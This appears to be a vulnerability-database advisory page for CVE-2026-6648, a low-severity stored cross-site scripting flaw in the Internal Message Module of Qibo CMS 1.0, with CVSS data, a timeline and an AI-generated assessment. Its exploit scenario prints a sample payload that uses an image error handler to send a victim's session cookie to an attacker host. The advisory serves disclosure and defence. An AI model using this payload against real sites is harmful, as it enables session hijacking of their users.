Skip to main content

Cms CVE-2026-6648

| EUVD-2026-23844 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-04-20 VulDB GHSA-7hc9-pw4r-x45r
XSS Cms
2.0
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

9
Severity Changed
Apr 29, 2026 - 01:12 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:12 NVD
5.1 (MEDIUM) 2.0 (LOW)
PoC Detected
Apr 29, 2026 - 01:00 vuln.today
Public exploit code
Analysis Generated
Apr 20, 2026 - 13:30 vuln.today
Severity Changed
Apr 20, 2026 - 13:22 NVD
LOW MEDIUM
CVSS changed
Apr 20, 2026 - 13:22 NVD
3.5 (LOW) 5.1 (MEDIUM)
EUVD ID Assigned
Apr 20, 2026 - 13:15 euvd
EUVD-2026-23844
Analysis Generated
Apr 20, 2026 - 13:15 vuln.today
CVE Published
Apr 20, 2026 - 13:00 nvd
LOW 2.0

DescriptionCVE.org

A vulnerability was found in Qibo CMS 1.0. Affected by this vulnerability is an unknown functionality of the component Internal Message Module. Performing a manipulation results in cross site scripting. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Cross-site scripting (XSS) in Qibo CMS 1.0 Internal Message Module allows authenticated remote attackers to inject malicious scripts through message manipulation, affecting user sessions and data integrity. The vulnerability requires user interaction (UI:P) and valid authentication (PR:L), limiting exposure to authenticated users. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker gains authenticated access
Delivery
Crafts XSS payload in message content
Exploit
Sends/stores malicious message
Execution
Target user opens Internal Message Module
Persist
Browser executes embedded script
Impact
Attacker steals session or performs unauthorized action
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires three specific, concrete conditions: (1) Attacker must possess a valid authenticated account (low-privilege user acceptable per PR:L in CVSS) on the Qibo CMS 1.0 instance; (2) The target user must actively visit and view a message containing the injected payload within the Internal Message Module - this is the user interaction requirement (UI:P); (3) The target's browser must have JavaScript enabled and not be protected by a restrictive Content Security Policy. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Risk assessment reveals a moderate but manageable threat. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated Qibo CMS user receives a message from an attacker containing embedded JavaScript (e.g., <img src=x onerror='fetch(attacker.com/steal?cookie='+document.cookie)'>). When the user views the Internal Message Module to read this message, the browser executes the embedded script, exfiltrating the user's session cookie to the attacker's server. …
Remediation No vendor-released patch has been identified at time of analysis, likely due to the vendor's non-responsiveness to disclosure. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-6648 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy